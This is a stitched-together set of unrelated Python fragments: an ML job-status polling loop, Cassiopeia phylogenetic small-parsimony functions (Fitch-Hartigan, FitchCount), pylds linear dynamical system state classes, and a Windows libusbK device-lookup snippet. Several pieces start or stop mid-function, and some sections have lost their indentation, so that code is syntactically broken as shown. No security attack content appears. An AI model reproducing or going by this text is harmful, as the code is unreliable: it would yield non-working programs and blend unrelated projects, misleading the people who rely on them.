                                        data=post_data, headers=auth_headers)
            if get_response.status_code not in (200, 201):
                err_msg = "Failed with GET Response Status=" \
                    + str(get_response.status_code) \
                    + " Reason=" + str(get_response.reason)
                lg(err_msg, 0)
                lg("Details:\n" + str(get_response.text) + "\n", 0)
                status = "Failed"
                retry += 1
                if retry > max_retries:
                    lg("Failed to get job=" + str(job_id) + " status", 0)
                    break
                lg("Failed to get job=" + str(job_id) + " status retry="
                   + str(retry) + "/" + str(max_retries), 0)
            else:
                lg("SUCCESS - GET Response Status="
                   + str(get_response.status_code)
                   + " Reason=" + str(get_response.reason), 5)
                retry = 0
                status = "SUCCESS"
                err_msg = ""
                record = json.loads(get_response.text)
                job_status = str(record["job"]["status"]).strip().lower()
                if job_status in running_states:
                    lg("Job=" + str(job_id) + " "
                       + running_states[job_status], 5)
                elif job_status in ("completed", "cancelled", "error"):
                    lg("Job=" + str(job_id) + " " + job_status, 5)
                    break
                else:
                    # Bug fix: unknown statuses used to be logged as
                    # "completed" at info level; report them as unexpected
                    # instead (consistent with wait_on_job).
                    lg("Job=" + str(job_id) + " in unexpected status="
                       + str(job_status), 0)
                    break
            # end of if/else
            sleep(sleep_interval)
        # end of while not_done
    except Exception as w:
        status = "Exception"
        err_msg = "Failed waiting for job=" + str(job_id) + " with Ex=" + str(w)
        lg(err_msg, 0)
    # end of try/ex
    results = {
        "status" : status,
        "error" : err_msg,
        "record" : record
    }
    return results
# end of wait_for_job_to_finish
def helper_get_job_analysis(job_id):
status = "Failed"
err_msg = ""
record = {}
results = {}
try:
query_params = {}
post_data = {}
resource_url = rt_url + "/ml/analysis/" | |
# Repository: YosefLab/SingleCellLineageTracing
"""
This file contains several tools useful for using small-parsimony to analyze
phylogenies.
Amongst these tools are basic Fitch-Hartigan reconstruction, parsimony scoring,
and the FitchCount algorithm described in Quinn, Jones et al, Science (2021).
"""
from typing import Dict, List, Optional
import itertools
import numpy as np
import pandas as pd
from pandas.api.types import is_categorical_dtype, is_numeric_dtype
from cassiopeia.data import CassiopeiaTree
from cassiopeia.mixins.errors import (
CassiopeiaError,
CassiopeiaTreeError,
FitchCountError,
)
def fitch_hartigan(
    cassiopeia_tree: CassiopeiaTree,
    meta_item: str,
    root: Optional[str] = None,
    state_key: str = "S1",
    label_key: str = "label",
    copy: bool = False,
) -> Optional[CassiopeiaTree]:
    """Run the complete Fitch-Hartigan small-parsimony algorithm.

    Given the leaf states stored in the cell meta column ``meta_item``,
    performs the bottom-up pass to infer the optimal ancestral state sets
    and then the top-down refinement to pick one random maximum-parsimony
    assignment, stored under ``label_key`` (by default 'label'). The tree
    is modified in place unless ``copy=True``.

    Args:
        cassiopeia_tree: CassiopeiaTree with cell meta data.
        meta_item: A column in the CassiopeiaTree cell meta corresponding
            to a categorical variable.
        root: Root from which to begin the top-down refinement. Only the
            subtree below this node will be considered.
        state_key: Attribute key under which the ancestral state sets are
            stored.
        label_key: Attribute key under which the maximum-parsimony
            assignment is stored.
        copy: Modify the tree in place or not.

    Returns:
        A new CassiopeiaTree if ``copy`` is True, else None.
    """
    tree = cassiopeia_tree.copy() if copy else cassiopeia_tree

    fitch_hartigan_bottom_up(tree, meta_item, state_key)
    fitch_hartigan_top_down(tree, root, state_key, label_key)

    if copy:
        return tree
    return None
def fitch_hartigan_bottom_up(
    cassiopeia_tree: CassiopeiaTree,
    meta_item: str,
    add_key: str = "S1",
    copy: bool = False,
) -> Optional[CassiopeiaTree]:
    """Performs Fitch-Hartigan bottom-up ancestral reconstruction.

    Performs the bottom-up phase of the Fitch-Hartigan small parsimony
    algorithm. A new attribute called "S1" will be added to each node
    storing the optimal set of ancestral states inferred from this
    bottom-up algorithm. If copy is False, the tree will be modified in
    place.

    Args:
        cassiopeia_tree: CassiopeiaTree object with cell meta data.
        meta_item: A column in the CassiopeiaTree cell meta corresponding
            to a categorical variable.
        add_key: Key to add for bottom-up reconstruction
        copy: Modify the tree in place or not.

    Returns:
        A new CassiopeiaTree if the copy is set to True, else None.

    Raises:
        CassiopeiaError if the tree does not have the specified meta data
        or the meta data is not categorical.
    """
    if meta_item not in cassiopeia_tree.cell_meta.columns:
        raise CassiopeiaError("Meta item does not exist in the cassiopeia tree")

    meta = cassiopeia_tree.cell_meta[meta_item]

    if is_numeric_dtype(meta):
        raise CassiopeiaError("Meta item is not a categorical variable.")

    if not is_categorical_dtype(meta):
        meta = meta.astype("category")

    cassiopeia_tree = cassiopeia_tree.copy() if copy else cassiopeia_tree

    for node in cassiopeia_tree.depth_first_traverse_nodes():

        if cassiopeia_tree.is_leaf(node):
            # A leaf's optimal state set is just its observed meta value.
            cassiopeia_tree.set_attribute(node, add_key, [meta.loc[node]])
        else:
            # Fitch-Hartigan bottom-up rule: keep the states that occur in
            # the maximal number of children's state sets.
            #
            # Bug fix: a previous revision special-cased single-child nodes
            # here, wrapping the child's state list in another list. That
            # assignment was dead code (immediately overwritten below) and
            # would have produced a wrongly nested list had it survived;
            # the general computation already handles unary nodes.
            children = cassiopeia_tree.children(node)
            all_labels = np.concatenate(
                [
                    cassiopeia_tree.get_attribute(child, add_key)
                    for child in children
                ]
            )
            states, frequencies = np.unique(all_labels, return_counts=True)

            S1 = states[np.where(frequencies == np.max(frequencies))]
            cassiopeia_tree.set_attribute(node, add_key, S1)

    return cassiopeia_tree if copy else None
def fitch_hartigan_top_down(
    cassiopeia_tree: CassiopeiaTree,
    root: Optional[str] = None,
    state_key: str = "S1",
    label_key: str = "label",
    copy: bool = False,
) -> Optional[CassiopeiaTree]:
    """Run the Fitch-Hartigan top-down refinement.

    Walks the subtree under ``root`` in preorder and assigns one
    maximum-parsimony state per node: a node inherits its parent's label
    whenever that label belongs to the node's optimal state set, and
    otherwise draws a random state from its own optimal set.

    Args:
        cassiopeia_tree: CassiopeiaTree that has been processed with the
            Fitch-Hartigan bottom-up algorithm.
        root: Root from which to begin this refinement. Only the subtree
            below this node will be considered.
        state_key: Attribute key that stores the Fitch-Hartigan ancestral
            states.
        label_key: Key to add that stores the maximum-parsimony assignment
            inferred from the top-down refinement.
        copy: Modify the tree in place or not.

    Returns:
        A new CassiopeiaTree if ``copy`` is True, else None.

    Raises:
        A CassiopeiaTreeError if Fitch-Hartigan bottom-up has not been
        called or if the state_key does not exist for a node.
    """
    if root is None:
        root = cassiopeia_tree.root

    tree = cassiopeia_tree.copy() if copy else cassiopeia_tree

    for node in tree.depth_first_traverse_nodes(source=root, postorder=False):

        optimal_states = tree.get_attribute(node, state_key)

        if node == root:
            # the root has no parent: pick any optimal state at random
            tree.set_attribute(
                node, label_key, np.random.choice(optimal_states)
            )
            continue

        parent_label = tree.get_attribute(tree.parent(node), label_key)
        if parent_label in optimal_states:
            tree.set_attribute(node, label_key, parent_label)
        else:
            tree.set_attribute(
                node, label_key, np.random.choice(optimal_states)
            )

    return tree if copy else None
def score_small_parsimony(
    cassiopeia_tree: CassiopeiaTree,
    meta_item: str,
    root: Optional[str] = None,
    infer_ancestral_states: bool = True,
    label_key: Optional[str] = "label",
) -> int:
    """Computes the small-parsimony of the tree.

    Counts, over the subtree rooted at `root`, the number of edges whose
    endpoints carry different labels in the cell meta column `meta_item`.

    Args:
        cassiopeia_tree: CassiopeiaTree object with cell meta data.
        meta_item: A column in the CassiopeiaTree cell meta corresponding to a
            categorical variable.
        root: Node to treat as the root. Only the subtree below
            this node will be considered.
        infer_ancestral_states: Whether or not ancestral states must be inferred
            (this will be False if `fitch_hartigan` has already been called on
            the tree.)
        label_key: If ancestral states have already been inferred, this key
            indicates the name of the attribute they're stored in.

    Returns:
        The parsimony score.

    Raises:
        CassiopeiaError if label_key has not been populated.
    """
    # Work on a copy so the caller's tree is never annotated as a side effect.
    tree = cassiopeia_tree.copy()
    if infer_ancestral_states:
        fitch_hartigan(tree, meta_item, root, label_key=label_key)
    score = 0
    for parent, child in tree.depth_first_traverse_edges(source=root):
        try:
            parent_label = tree.get_attribute(parent, label_key)
            child_label = tree.get_attribute(child, label_key)
        except CassiopeiaTreeError:
            raise CassiopeiaError(
                f"{label_key} does not exist for a node, "
                "try running Fitch-Hartigan or passing "
                "infer_ancestral_states=True."
            )
        if parent_label != child_label:
            score += 1
    return score
def fitch_count(
    cassiopeia_tree: CassiopeiaTree,
    meta_item: str,
    root: Optional[str] = None,
    infer_ancestral_states: bool = True,
    state_key: str = "S1",
    unique_states: Optional[List[str]] = None,
):
    """Runs the FitchCount algorithm.

    Performs the FitchCount algorithm for inferring the number of times that
    two states transition to one another across all equally-parsimonious
    solutions returned by the Fitch-Hartigan algorithm. The output is an
    MxM count matrix, where the values indicate the number of times that
    m1 transitioned to m2 along an edge in a Fitch-Hartigan solution.
    To obtain probabilities P(m1 -> m2), divide each row by its row-sum.
    This procedure will only work on categorical data and will otherwise raise
    an error.

    Args:
        cassiopeia_tree: CassiopeiaTree object with a tree and cell meta data.
        meta_item: A column in the CassiopeiaTree cell meta corresponding to a
            categorical variable.
        root: Node to treat as the root. Only the subtree below this node will
            be considered for the procedure.
        infer_ancestral_states: Whether or not to initialize the ancestral state
            sets with Fitch-Hartigan.
        state_key: If ancestral state sets have already been created, then this
            argument specifies what the attribute name is in the CassiopeiaTree
        unique_states: State space that can be optionally provided by the user.
            If this is not provided, we take the unique values in
            `cell_meta[meta_item]` to be the state space.

    Returns:
        An MxM count matrix indicating the number of edges that contained a
        transition between two states across all equally parsimonious
        solutions returned by Fitch-Hartigan.

    Raises:
        FitchCountError if the provided state space does not cover the states
        observed in the meta data.
    """
    # Work on a copy: subsetting and attribute annotation below are destructive.
    cassiopeia_tree = cassiopeia_tree.copy()
    if unique_states is None:
        unique_states = cassiopeia_tree.cell_meta[meta_item].unique()
    else:
        observed_states = cassiopeia_tree.cell_meta[meta_item].unique()
        if len(np.setdiff1d(observed_states, unique_states)) > 0:
            raise FitchCountError(
                "Specified state space does not span the set"
                " of states that appear in the meta data."
            )
    # Bug fix: `root` defaults to None, and the previous check
    # (`root != cassiopeia_tree.root`) passed None straight to subset_clade on
    # the default path. Only subset when an explicit, non-root node was given.
    if root is not None and root != cassiopeia_tree.root:
        cassiopeia_tree.subset_clade(root)
    if infer_ancestral_states:
        fitch_hartigan_bottom_up(cassiopeia_tree, meta_item, add_key=state_key)
    # Create a mapping from nodes to integers. Despite the name, this is a
    # breadth-first (top-down) ordering starting at the root.
    bfs_postorder = [cassiopeia_tree.root]
    for (_, child) in cassiopeia_tree.breadth_first_traverse_edges():
        bfs_postorder.append(child)
    node_to_i = dict(zip(bfs_postorder, range(len(bfs_postorder))))
    label_to_j = dict(zip(unique_states, range(len(unique_states))))
    # Dynamic-programming tables of the FitchCount algorithm.
    N = _N_fitch_count(
        cassiopeia_tree, unique_states, node_to_i, label_to_j, state_key
    )
    C = _C_fitch_count(
        cassiopeia_tree, N, unique_states, node_to_i, label_to_j, state_key
    )
    M = pd.DataFrame(np.zeros((N.shape[1], N.shape[1])))
    M.columns = unique_states
    M.index = unique_states
    # Aggregate the per-root-state counts into the final transition matrix.
    for s1 in unique_states:
        for s2 in unique_states:
            M.loc[s1, s2] = np.sum(
                C[
                    node_to_i[cassiopeia_tree.root],
                    :,
                    label_to_j[s1],
                    label_to_j[s2],
                ]
            )
    return M
def _N_fitch_count(
cassiopeia_tree: CassiopeiaTree,
unique_states: List[str],
node_to_i: Dict[str, int],
label_to_j: Dict[str, int],
state_key: str = "S1",
) -> np.array(int):
"""Fill in the dynamic programming table N for FitchCount.
| |
from __future__ import division
from warnings import warn
import numpy as np
from scipy.sparse import csr_matrix
from pybasicbayes.util.general import objarray
from pylds.lds_messages_interface import info_E_step, info_sample, kalman_info_filter, kalman_filter, E_step
# TODO on instantiating, maybe gaussian states should be resampled
# TODO make niter an __init__ arg instead of a method arg
###########
# bases #
###########
class _LDSStates(object):
    """
    Latent state sequence for a linear dynamical system (LDS).

    Holds one sequence of observations (``data``), optional exogenous inputs
    (``inputs``) and the Gaussian latent states (``gaussian_states``), and
    exposes sampling, filtering, smoothing and E-step operations in terms of
    the owning model's dynamics and emission distributions.
    """
    def __init__(self, model, T=None, data=None, inputs=None, stateseq=None,
                 initialize_from_prior=False,
                 initialize_to_noise=True):
        """
        Args:
            model: owning LDS model; supplies the dynamics/emission distributions.
            T: sequence length; inferred from ``data.shape[0]`` if omitted.
            data: observation sequence (or None).
            inputs: exogenous inputs; defaults to an empty (T, 0) array.
            stateseq: explicit latent state sequence to adopt as-is.
            initialize_from_prior: sample the states from the generative prior.
            initialize_to_noise: initialize the states to standard-normal noise.
        """
        self.model = model
        self.T = T if T is not None else data.shape[0]
        self.data = data
        self.inputs = np.zeros((self.T, 0)) if inputs is None else inputs
        # Cached log-normalizer from the most recent filtering pass.
        self._normalizer = None
        # Initialization precedence: explicit sequence > prior draw > noise > resample.
        if stateseq is not None:
            self.gaussian_states = stateseq
        elif initialize_from_prior:
            self.generate_states()
        elif initialize_to_noise:
            self.gaussian_states = np.random.normal(size=(self.T, self.D_latent))
        elif data is not None:
            self.resample()
        else:
            raise Exception("Invalid options. Must specify how states are initialized.")
    ### Basics
    def log_likelihood(self):
        """Return the marginal log-likelihood, computed lazily via the info-form filter."""
        if self._normalizer is None:
            self._normalizer, _, _ = kalman_info_filter(*self.info_params)
            # self._normalizer += self._info_extra_loglike_terms(
            #     *self.extra_info_params,
            #     isdiag=self.diagonal_noise)
        return self._normalizer
    def generate_states(self):
        """Sample a (T, D_latent) latent state sequence from the generative prior."""
        # Generate from the prior and raise exception if unstable
        T, n = self.T, self.D_latent
        gss = np.empty((T,n),dtype='double')
        gss[0] = np.random.multivariate_normal(self.mu_init, self.sigma_init)
        for t in range(1,T):
            # Condition the dynamics regression on the previous state and input.
            gss[t] = self.dynamics_distn.\
                rvs(x=np.hstack((gss[t-1][None,:], self.inputs[t-1][None,:])),
                    return_xy=False)
            assert np.all(np.isfinite(gss[t])), "LDS appears to be unstable!"
        self.gaussian_states = gss
    def generate_obs(self):
        """Sample a (T, D_emission) observation sequence given the current states."""
        # Go through each time bin, get the discrete latent state,
        # use that to index into the emission_distns to get samples
        T, p = self.T, self.D_emission
        ed = self.emission_distn
        gss = self.gaussian_states
        data = np.empty((T,p),dtype='double')
        for t in range(self.T):
            data[t] = \
                ed.rvs(x=np.hstack((gss[t][None, :], self.inputs[t][None,:])),
                       return_xy=False)
        return data
    def sample_predictions(self, Tpred, inputs=None, states_noise=False, obs_noise=False):
        """
        Forecast ``Tpred`` steps past the end of the sequence.

        Filters the observed data, propagates the last filtered state forward
        under the dynamics, and returns the predicted observations. Process and
        observation noise are injected only when the corresponding flag is set.
        """
        inputs = np.zeros((Tpred, self.D_input)) if inputs is None else inputs
        _, filtered_mus, filtered_sigmas = kalman_filter(
            self.mu_init, self.sigma_init,
            self.A, self.B, self.sigma_states,
            self.C, self.D, self.sigma_obs,
            self.inputs, self.data)
        # One-step-ahead predictive distribution from the last filtered state.
        init_mu = self.A.dot(filtered_mus[-1]) + self.B.dot(self.inputs[-1])
        init_sigma = self.sigma_states + self.A.dot(
            filtered_sigmas[-1]).dot(self.A.T)
        # Pre-sampled process noise for steps 1..Tpred-1 (zero if noiseless).
        randseq = np.zeros((Tpred - 1, self.D_latent))
        if states_noise:
            L = np.linalg.cholesky(self.sigma_states)
            randseq += np.random.randn(Tpred - 1, self.D_latent).dot(L.T)
        states = np.empty((Tpred, self.D_latent))
        if states_noise:
            states[0] = np.random.multivariate_normal(init_mu, init_sigma)
        else:
            states[0] = init_mu
        for t in range(1, Tpred):
            states[t] = self.A.dot(states[t - 1]) + \
                        self.B.dot(inputs[t - 1]) + \
                        randseq[t - 1]
        obs = states.dot(self.C.T) + inputs.dot(self.D.T)
        if obs_noise:
            L = np.linalg.cholesky(self.sigma_obs)
            obs += np.random.randn(Tpred, self.D_emission).dot(L.T)
        return obs
    ## convenience properties
    @property
    def D_latent(self):
        # Latent state dimension (output dim of the dynamics regression).
        return self.dynamics_distn.D_out
    @property
    def D_input(self):
        # Exogenous input dimension: dynamics input minus the recurrent part.
        return self.dynamics_distn.D_in - self.dynamics_distn.D_out
    @property
    def D_emission(self):
        # Observation dimension.
        return self.emission_distn.D_out
    @property
    def dynamics_distn(self):
        return self.model.dynamics_distn
    @property
    def emission_distn(self):
        return self.model.emission_distn
    @property
    def diagonal_noise(self):
        # True when the model declares a diagonal emission noise covariance.
        return self.model.diagonal_noise
    @property
    def mu_init(self):
        return self.model.mu_init
    @property
    def sigma_init(self):
        return self.model.sigma_init
    @property
    def A(self):
        # State transition matrix: left block of the dynamics regression matrix.
        return self.dynamics_distn.A[:, :self.D_latent]
    @property
    def B(self):
        # Input-to-state matrix: right block of the dynamics regression matrix.
        return self.dynamics_distn.A[:, self.D_latent:]
    @property
    def sigma_states(self):
        # Process noise covariance.
        return self.dynamics_distn.sigma
    @property
    def C(self):
        # Emission matrix: left block of the emission regression matrix.
        return self.emission_distn.A[:,:self.D_latent]
    @property
    def D(self):
        # Input-to-observation matrix: right block of the emission regression matrix.
        return self.emission_distn.A[:, self.D_latent:]
    @property
    def sigma_obs(self):
        # Observation noise covariance.
        return self.emission_distn.sigma
    @property
    def _kwargs(self):
        # Extend the parent's serialization kwargs with the latent states.
        return dict(super(_LDSStates, self)._kwargs,
                    gaussian_states=self.gaussian_states)
    @property
    def info_init_params(self):
        """Information-form potential (J, h, log Z) for the initial state."""
        J_init = np.linalg.inv(self.sigma_init)
        h_init = np.linalg.solve(self.sigma_init, self.mu_init)
        log_Z_init = -1. / 2 * h_init.dot(np.linalg.solve(J_init, h_init))
        log_Z_init += 1. / 2 * np.linalg.slogdet(J_init)[1]
        log_Z_init -= self.D_latent / 2. * np.log(2 * np.pi)
        return J_init, h_init, log_Z_init
    @property
    def info_dynamics_params(self):
        """Information-form pairwise potentials for the state transitions."""
        A = self.A
        B = self.B
        Q = self.sigma_states
        # Get the pairwise potentials
        # TODO: Check for diagonal before inverting
        J_pair_22 = np.linalg.inv(Q)
        J_pair_21 = -J_pair_22.dot(A)
        J_pair_11 = A.T.dot(-J_pair_21)
        # Check if diagonal and avoid inverting D_obs x D_obs matrix
        mBTQiA = B.T.dot(J_pair_21)
        BTQi = B.T.dot(J_pair_22)
        # Linear terms contributed by the exogenous inputs at each step.
        h_pair_1 = self.inputs[:-1].dot(mBTQiA)
        h_pair_2 = self.inputs[:-1].dot(BTQi)
        log_Z_pair = -1. / 2 * np.linalg.slogdet(Q)[1]
        log_Z_pair -= self.D_latent / 2. * np.log(2 * np.pi)
        hJh_pair = B.T.dot(np.linalg.solve(Q, B))
        log_Z_pair -= 1. / 2 * np.einsum('ij,ti,tj->t', hJh_pair, self.inputs[:-1], self.inputs[:-1])
        return J_pair_11, J_pair_21, J_pair_22, h_pair_1, h_pair_2, log_Z_pair
    @property
    def info_emission_params(self):
        """Information-form node potentials contributed by the observations."""
        C = self.C
        # Subtract the input contribution so the potential is in x alone.
        centered_data = self.data - self.inputs.dot(self.D.T)
        # Observations
        log_Z_node = -self.D_emission / 2. * np.log(2 * np.pi) * np.ones(self.T)
        if self.diagonal_noise:
            # Use the fact that the diagonal regression prior is factorized
            rsq = self.emission_distn.sigmasq_flat
            RinvC = (1/rsq)[:,None] * C
            J_node = C.T.dot(RinvC)
            h_node = centered_data.dot(RinvC)
            log_Z_node -= 1./2 * np.sum(np.log(rsq))
            log_Z_node -= 1./2 * np.sum(centered_data**2 * 1./rsq, axis=1)
        else:
            Rinv = np.linalg.inv(self.sigma_obs)
            RinvC = Rinv.dot(C)
            J_node = C.T.dot(RinvC)
            h_node = centered_data.dot(RinvC)
            log_Z_node += 1./2 * np.linalg.slogdet(Rinv)[1]
            log_Z_node -= 1./2 * np.einsum('ij,ti,tj->t', Rinv,
                                           centered_data, centered_data)
        return J_node, h_node, log_Z_node
    @property
    def info_params(self):
        # Full parameter tuple consumed by the info-form message-passing routines.
        return self.info_init_params + self.info_dynamics_params + self.info_emission_params
    def info_filter(self):
        """Run the information-form Kalman filter; caches the log-normalizer."""
        self._normalizer, filtered_Js, filtered_hs = \
            kalman_info_filter(*self.info_params)
        return filtered_Js, filtered_hs
    def kalman_filter(self):
        """Run the standard (moment-form) Kalman filter; caches the log-normalizer."""
        self._normalizer, filtered_mus, filtered_sigmas = kalman_filter(
            self.mu_init, self.sigma_init,
            self.A, self.B, self.sigma_states,
            self.C, self.D, self.sigma_obs,
            self.inputs, self.data)
        # Update the normalization constant
        # self._gaussian_normalizer += self._info_extra_loglike_terms(
        #     *self.extra_info_params,
        #     isdiag=self.diagonal_noise)
        return filtered_mus, filtered_sigmas
    def smooth(self):
        """Return the smoothed observation means E[y_t] given all the data."""
        # Use the info E step because it can take advantage of diagonal noise
        # The standard E step could but we have not implemented it
        self.info_E_step()
        return self.smoothed_mus.dot(self.C.T) + self.inputs.dot(self.D.T)
    ### Expectations
    def E_step(self):
        """E step of EM; delegates to the information-form implementation."""
        return self.info_E_step()
    def std_E_step(self):
        """E step via the standard (moment-form) Kalman smoother."""
        self._normalizer, self.smoothed_mus, self.smoothed_sigmas, \
            E_xtp1_xtT = E_step(
                self.mu_init, self.sigma_init,
                self.A, self.B, self.sigma_states,
                self.C, self.D, self.sigma_obs,
                self.inputs, self.data)
        self._set_expected_stats(
            self.smoothed_mus, self.smoothed_sigmas, E_xtp1_xtT)
    def info_E_step(self):
        """E step via information-form message passing."""
        self._normalizer, self.smoothed_mus, \
            self.smoothed_sigmas, E_xtp1_xtT = \
            info_E_step(*self.info_params)
        self._set_expected_stats(
            self.smoothed_mus, self.smoothed_sigmas, E_xtp1_xtT)
    def _set_expected_stats(self, smoothed_mus, smoothed_sigmas, E_xtp1_xtT):
        """
        Cache expected sufficient statistics for the dynamics and emission
        distributions, computed from the smoothed posterior marginals.
        Sets ``self.E_dynamics_stats`` and ``self.E_emission_stats``.
        """
        # Get the emission stats
        p, n, d, T, inputs, data = \
            self.D_emission, self.D_latent, self.D_input, self.T, \
            self.inputs, self.data
        # Per-time second moments of the latent states and inputs.
        E_x_xT = smoothed_sigmas + self.smoothed_mus[:, :, None] * self.smoothed_mus[:, None, :]
        E_x_uT = smoothed_mus[:, :, None] * self.inputs[:, None, :]
        E_u_uT = self.inputs[:, :, None] * self.inputs[:, None, :]
        # Block moment matrix over the stacked (x, u) vector.
        E_xu_xuT = np.concatenate((
            np.concatenate((E_x_xT, E_x_uT), axis=2),
            np.concatenate((np.transpose(E_x_uT, (0, 2, 1)), E_u_uT), axis=2)),
            axis=1)
        E_xut_xutT = E_xu_xuT[:-1].sum(0)
        E_xtp1_xtp1T = E_x_xT[1:].sum(0)
        E_xtp1_xtT = E_xtp1_xtT.sum(0)
        E_xtp1_utT = (smoothed_mus[1:, :, None] * inputs[:-1, None, :]).sum(0)
        E_xtp1_xutT = np.hstack((E_xtp1_xtT, E_xtp1_utT))
        # def is_symmetric(A):
        #     return np.allclose(A, A.T)
        # assert is_symmetric(E_xt_xtT)
        # assert is_symmetric(E_xtp1_xtp1T)
        self.E_dynamics_stats = np.array(
            [E_xtp1_xtp1T, E_xtp1_xutT, E_xut_xutT, self.T - 1])
        # Emission statistics
        E_yyT = np.sum(data**2, axis=0) if self.diagonal_noise else data.T.dot(data)
        E_yxT = data.T.dot(smoothed_mus)
        E_yuT = data.T.dot(inputs)
        E_yxuT = np.hstack((E_yxT, E_yuT))
        self.E_emission_stats = objarray([E_yyT, E_yxuT, E_xu_xuT.sum(0), T])
######################
# algorithm mixins #
######################
class _LDSStatesGibbs(_LDSStates):
    """Gibbs-sampling updates for the LDS latent state sequence."""
    def resample(self, niter=1):
        """Draw a fresh latent state sequence from its full conditional."""
        self.resample_gaussian_states()
    def _init_gibbs_from_mf(self):
        raise NotImplementedError  # TODO
    def resample_gaussian_states(self):
        """Sample the Gaussian states via information-form message passing."""
        normalizer, states = info_sample(*self.info_params)
        self._normalizer = normalizer
        self.gaussian_states = states
class _LDSStatesMeanField(_LDSStates):
    """
    Mean-field (variational) updates for the LDS latent state sequence.

    Mirrors the information-form potentials of the base class, but built from
    the *expected* sufficient statistics of the dynamics/emission
    distributions under their variational factors.
    """
    @property
    def expected_info_dynamics_params(self):
        """Expected information-form pairwise potentials under q(dynamics)."""
        J_pair_22, J_pair_21, J_pair_11, logdet_pair = \
            self.dynamics_distn.meanfield_expectedstats()
        # Compute E[B^T Q^{-1}] and E[B^T Q^{-1} A]
        n = self.D_latent
        # Slice the stacked (x, u) blocks apart; .copy("C") forces C-contiguous
        # arrays — presumably required by the compiled message-passing code
        # (TODO confirm).
        E_Qinv = J_pair_22.copy("C")
        E_AT_Qinv = (J_pair_21[:,:n].T).copy("C")
        E_BT_Qinv = (J_pair_21[:,n:].T).copy("C")
        E_AT_Qinv_A = J_pair_11[:n,:n].copy("C")
        E_BT_Qinv_A = J_pair_11[n:,:n].copy("C")
        E_BT_Qinv_B = J_pair_11[n:,n:].copy("C")
        # Linear terms contributed by the exogenous inputs.
        h_pair_1 = (-self.inputs[:-1].dot(E_BT_Qinv_A)).copy("C")
        h_pair_2 = (self.inputs[:-1].dot(E_BT_Qinv)).copy("C")
        log_Z_pair = 1./2 * logdet_pair * np.ones(self.T-1)
        log_Z_pair -= self.D_latent / 2. * np.log(2 * np.pi)
        log_Z_pair -= 1. / 2 * np.einsum('ij,ti,tj->t', E_BT_Qinv_B, self.inputs[:-1], self.inputs[:-1])
        return E_AT_Qinv_A, -E_AT_Qinv, E_Qinv, h_pair_1, h_pair_2, log_Z_pair
    @property
    def expected_info_emission_params(self):
        """Expected information-form node potentials under q(emissions)."""
        J_yy, J_yx, J_node, logdet_node = \
            self.emission_distn.meanfield_expectedstats()
        n = self.D_latent
        E_Rinv = J_yy
        E_Rinv_C = J_yx[:,:n].copy("C")
        E_Rinv_D = J_yx[:,n:].copy("C")
        E_CT_Rinv_C = (J_node[:n,:n]).copy("C")
        E_DT_Rinv_C = (J_node[n:,:n]).copy("C")
        E_DT_Rinv_D = (J_node[n:,n:]).copy("C")
        # h_node = E[C^T R^{-1}] (y - D u) split into its two contributions.
        h_node = self.data.dot(E_Rinv_C)
        h_node -= self.inputs.dot(E_DT_Rinv_C)
        log_Z_node = -self.D_emission / 2. * np.log(2 * np.pi) * np.ones(self.T)
        log_Z_node += 1. / 2 * logdet_node
        # E[(y-Du)^T R^{-1} (y-Du)]
        log_Z_node -= 1. / 2 * np.einsum('ij,ti,tj->t', E_Rinv,
                                         self.data, self.data)
        log_Z_node -= 1. / 2 * np.einsum('ij,ti,tj->t', -2*E_Rinv_D,
                                         self.data, self.inputs)
        log_Z_node -= 1. / 2 * np.einsum('ij,ti,tj->t', E_DT_Rinv_D,
                                         self.inputs, self.inputs)
        return E_CT_Rinv_C, h_node, log_Z_node
    @property
    def expected_info_params(self):
        # Initial-state potential is deterministic; dynamics/emissions use
        # variational expectations.
        return self.info_init_params + \
               self.expected_info_dynamics_params + \
               self.expected_info_emission_params
    def meanfieldupdate(self):
        """Update q(states) via info-form smoothing and cache expected stats."""
        self._mf_lds_normalizer, self.smoothed_mus, self.smoothed_sigmas, \
            E_xtp1_xtT = info_E_step(*self.expected_info_params)
        self._set_expected_stats(
            self.smoothed_mus,self.smoothed_sigmas,E_xtp1_xtT)
    def get_vlb(self):
        """Return this sequence's contribution to the variational lower bound
        (cached by the last meanfieldupdate call)."""
        return self._mf_lds_normalizer
    def meanfield_smooth(self):
        """Smooth the observations using the expected emission matrix E[C, D]."""
        if self.diagonal_noise:
            E_C, _, _, _ = self.emission_distn.mf_expectations
        else:
            ed = self.emission_distn
            _,_,E_C,_ = ed._natural_to_standard(ed.mf_natural_hypparam)
        return np.hstack((self.smoothed_mus, self.inputs)).dot(E_C.T)
####################
# states classes #
####################
class LDSStates(
    _LDSStatesGibbs,
    _LDSStatesMeanField):
    """Concrete LDS state sequence supporting both Gibbs and mean-field inference."""
    pass
class LDSStatesMissingData(_LDSStatesGibbs, _LDSStatesMeanField):
    def __init__(self, model, T=None, data=None, mask=None, **kwargs):
        """
        Args:
            mask: boolean array with the same shape as ``data``; True marks an
                observed entry. If omitted, it is derived from NaNs in ``data``
                (all-True when there are no NaNs or no data at all).
        """
        if mask is not None:
            assert mask.shape == data.shape
            self.mask = mask
        elif (data is not None) and isinstance(data, np.ndarray):
            if np.any(np.isnan(data)):
                warn("data includes NaN's. Treating these as missing data.")
                self.mask = ~np.isnan(data)
                # NOTE(review): this zeroes NaNs *in place*, mutating the
                # caller's array — confirm this side effect is intended.
                data[np.isnan(data)] = 0
            else:
                self.mask = np.ones_like(data, dtype=bool)
        else:
            # No usable data: treat every entry as observed.
            self.mask = np.ones((T, model.emission_distn.D_out), dtype=bool)
        super(LDSStatesMissingData, self).__init__(model, T=T, data=data, **kwargs)
@property
def info_emission_params(self):
if self.mask is None:
return super(LDSStatesMissingData, self).info_emission_params
if self.diagonal_noise:
return self._info_emission_params_diag
else:
return self._info_emission_params_dense
@property
def _info_emission_params_diag(self):
C, D = self.C, self.D
sigmasq = self.emission_distn.sigmasq_flat
J_obs = self.mask / sigmasq
centered_data = self.data - self.inputs.dot(D.T)
CCT = np.array([np.outer(cp, cp) for cp in C]).\
reshape((self.D_emission, self.D_latent ** 2))
J_node | |
actually significant, but it needs to be not None
"""
# Get a list of devices to use later
device_list = self.libk.KLST_HANDLE()
device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
ret = self.lib.LstK_Init(ctypes.byref(device_list), 0)
if ret == 0:
raise ctypes.WinError()
# Get info for a device with that vendor ID and product ID
device_info = ctypes.pointer(self.libk.KLST_DEV_INFO())
ret = self.lib.LstK_FindByVidPid(device_list, Vid, Pid, ctypes.byref(device_info))
self.lib.LstK_Free(ctypes.byref(device_list))
if device_info is None or ret == 0:
return None
# Populate function pointers for use with the driver our device uses (which should be libusbK)
